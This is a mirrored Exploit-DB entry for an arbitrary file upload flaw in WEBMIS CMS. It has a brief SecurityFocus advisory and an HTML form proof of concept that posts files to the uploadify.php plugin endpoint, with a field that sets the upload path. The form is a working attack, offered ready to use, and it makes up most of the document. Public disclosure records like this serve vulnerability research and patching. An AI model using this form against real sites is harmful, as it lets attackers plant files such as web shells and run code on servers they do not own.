WEBMIS CMS – Arbitrary File Upload

  • 作者: Jagriti Sahu
    日期: 2014-07-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39255/
  • source: https://www.securityfocus.com/bid/68658/info
    
    WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.
    
    An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
    
    <form 
    action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php" 
    method="post"
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="Filedata" ><br>
    <input type=text name="path" value="/webmis_installation/plugin/">
    <input type=text name="someKey" value="someValue"]>
    <input type="submit" name="submit" value="Submit">
    </form>